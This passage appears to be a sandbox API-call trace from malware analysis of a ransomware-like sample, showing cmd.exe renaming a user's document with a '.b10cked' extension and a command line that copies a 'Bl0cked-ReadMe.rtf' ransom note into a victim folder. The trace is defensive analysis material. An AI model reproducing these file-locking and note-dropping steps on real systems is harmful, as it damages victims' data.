lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx", lpFilePart=0x0) returned 0x35 [0134.390] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\tq3ypk_6c.docx")) returned 0x20 [0134.390] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\tq3ypk_6c.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\tq3ypk_6c.docx.b10cked"), dwFlags=0x3) returned 1 [0134.391] FindClose (in: hFindFile=0x380ef0 | out: hFindFile=0x380ef0) returned 1 [0134.391] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28e9c8 | out: _Buffer=" 1") returned 9 [0134.391] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.391] GetFileType (hFile=0x7) returned 0x2 [0134.391] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0134.391] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28e954 | out: lpMode=0x28e954) returned 1 [0134.391] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.391] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28e988 | out: lpConsoleScreenBufferInfo=0x28e988) returned 1 [0134.391] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0134.392] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28e9c8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0134.392] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28e9ac, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28e9ac*=0x1a) returned 1 [0134.392] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.392] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0134.392] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.392] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0134.392] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.392] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0134.393] SetConsoleInputExeNameW () returned 0x1 [0134.393] GetConsoleOutputCP () returned 0x1b5 [0134.393] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.393] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.393] exit (_Code=0) Process: id = "128" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16840" os_pid = "0xb90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13223 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13224 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13225 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13226 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 13227 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13228 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13229 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13230 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13231 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 13232 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13298 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13299 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13300 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13301 start_va = 0x2d0000 end_va = 0x336fff entry_point = 0x2d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13302 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 13303 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 13304 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13305 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13306 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13307 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13308 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13309 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13310 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13311 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13312 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 13313 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13314 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 13315 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 13316 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 13317 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 13318 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 13319 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 13320 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13321 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Thread: id = 185 os_tid = 0xb9c [0134.319] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fa8c | out: lpSystemTimeAsFileTime=0x16fa8c*(dwLowDateTime=0x89fe3500, dwHighDateTime=0x1d440a9)) [0134.319] GetCurrentProcessId () returned 0xb90 [0134.319] GetCurrentThreadId () returned 0xb9c [0134.319] GetTickCount () returned 0x2a997 [0134.319] QueryPerformanceCounter (in: lpPerformanceCount=0x16fa84 | out: lpPerformanceCount=0x16fa84*=19111003200) returned 1 [0134.321] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0134.322] __set_app_type (_Type=0x1) [0134.322] __p__fmode () returned 0x76b331f4 [0134.322] __p__commode () returned 0x76b331fc [0134.322] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0134.322] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0134.322] GetCurrentThreadId () returned 0xb9c [0134.322] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb9c) returned 0x38 [0134.322] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0134.322] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0134.322] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.323] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0134.323] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fa1c | out: phkResult=0x16fa1c*=0x0) returned 0x2 [0134.323] VirtualQuery (in: lpAddress=0x16fa53, lpBuffer=0x16f9ec, dwLength=0x1c | out: lpBuffer=0x16f9ec*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.323] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f9ec, dwLength=0x1c | out: lpBuffer=0x16f9ec*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0134.323] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f9ec, dwLength=0x1c | out: lpBuffer=0x16f9ec*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0134.323] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f9ec, dwLength=0x1c | out: lpBuffer=0x16f9ec*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.323] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f9ec, dwLength=0x1c | out: lpBuffer=0x16f9ec*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.323] GetConsoleOutputCP () returned 0x1b5 [0134.323] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.323] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0134.323] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.323] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0134.323] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.323] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0134.324] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.324] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0134.324] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.324] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0134.324] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.324] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0134.324] GetEnvironmentStringsW () returned 0x1e0198* [0134.324] FreeEnvironmentStringsW (penv=0x1e0198) returned 1 [0134.324] GetEnvironmentStringsW () returned 0x1e0198* [0134.325] FreeEnvironmentStringsW (penv=0x1e0198) returned 1 [0134.325] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e98c | out: phkResult=0x16e98c*=0x40) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x0, lpData=0x16e998*=0xc0, lpcbData=0x16e990*=0x1000) returned 0x2 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x4, lpData=0x16e998*=0x1, lpcbData=0x16e990*=0x4) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x0, lpData=0x16e998*=0x1, lpcbData=0x16e990*=0x1000) returned 0x2 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x4, lpData=0x16e998*=0x0, lpcbData=0x16e990*=0x4) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x4, lpData=0x16e998*=0x40, lpcbData=0x16e990*=0x4) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x4, lpData=0x16e998*=0x40, lpcbData=0x16e990*=0x4) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x0, lpData=0x16e998*=0x40, lpcbData=0x16e990*=0x1000) returned 0x2 [0134.325] RegCloseKey (hKey=0x40) returned 0x0 [0134.325] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e98c | out: phkResult=0x16e98c*=0x40) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x0, lpData=0x16e998*=0x40, lpcbData=0x16e990*=0x1000) returned 0x2 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x4, lpData=0x16e998*=0x1, lpcbData=0x16e990*=0x4) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x0, lpData=0x16e998*=0x1, lpcbData=0x16e990*=0x1000) returned 0x2 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x4, lpData=0x16e998*=0x0, lpcbData=0x16e990*=0x4) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x4, lpData=0x16e998*=0x9, lpcbData=0x16e990*=0x4) returned 0x0 [0134.325] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x4, lpData=0x16e998*=0x9, lpcbData=0x16e990*=0x4) returned 0x0 [0134.326] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e994, lpData=0x16e998, lpcbData=0x16e990*=0x1000 | out: lpType=0x16e994*=0x0, lpData=0x16e998*=0x9, lpcbData=0x16e990*=0x1000) returned 0x2 [0134.326] RegCloseKey (hKey=0x40) returned 0x0 [0134.326] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886368 [0134.326] srand (_Seed=0x5b886368) [0134.326] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"" [0134.326] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"" [0134.326] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.326] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1e18f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0134.326] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0134.326] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0134.326] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.326] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0134.326] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0134.327] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0134.327] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0134.327] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0134.327] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0134.327] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0134.327] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0134.327] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0134.327] GetEnvironmentStringsW () returned 0x1e22e8* [0134.327] FreeEnvironmentStringsW (penv=0x1e22e8) returned 1 [0134.327] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.327] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.327] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0134.327] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0134.327] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0134.327] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0134.327] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0134.327] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0134.327] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0134.327] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0134.327] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f758 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.327] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f758, lpFilePart=0x16f754 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f754*="Desktop") returned 0x18 [0134.327] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0134.328] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f4d4 | out: lpFindFileData=0x16f4d4) returned 0x1e0028 [0134.328] FindClose (in: hFindFile=0x1e0028 | out: hFindFile=0x1e0028) returned 1 [0134.328] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f4d4 | out: lpFindFileData=0x16f4d4) returned 0x1e0028 [0134.328] FindClose (in: hFindFile=0x1e0028 | out: hFindFile=0x1e0028) returned 1 [0134.328] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f4d4 | out: lpFindFileData=0x16f4d4) returned 0x1e0028 [0134.328] FindClose (in: hFindFile=0x1e0028 | out: hFindFile=0x1e0028) returned 1 [0134.328] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0134.328] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0134.328] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0134.328] GetEnvironmentStringsW () returned 0x1e2b08* [0134.329] FreeEnvironmentStringsW (penv=0x1e2b08) returned 1 [0134.329] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.329] GetConsoleOutputCP () returned 0x1b5 [0134.329] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.329] GetUserDefaultLCID () returned 0x409 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f898, cchData=128 | out: lpLCData="0") returned 2 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f898, cchData=128 | out: lpLCData="0") returned 2 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f898, cchData=128 | out: lpLCData="1") returned 2 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0134.330] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0134.331] GetConsoleTitleW (in: lpConsoleTitle=0x1d08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.331] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0134.332] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0134.332] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0134.332] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0134.332] _wcsicmp (_String1="type", _String2=")") returned 75 [0134.332] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0134.333] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0134.333] _wcsicmp (_String1="IF", _String2="type") returned -11 [0134.333] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0134.333] _wcsicmp (_String1="REM", _String2="type") returned -2 [0134.333] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0134.337] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.337] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.337] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.337] GetFileType (hFile=0x7) returned 0x2 [0134.397] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0134.397] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f790 | out: lpMode=0x16f790) returned 1 [0134.397] _dup (_FileHandle=1) returned 3 [0134.397] _close (_FileHandle=1) returned 0 [0134.397] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0134.397] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf" (normalized: 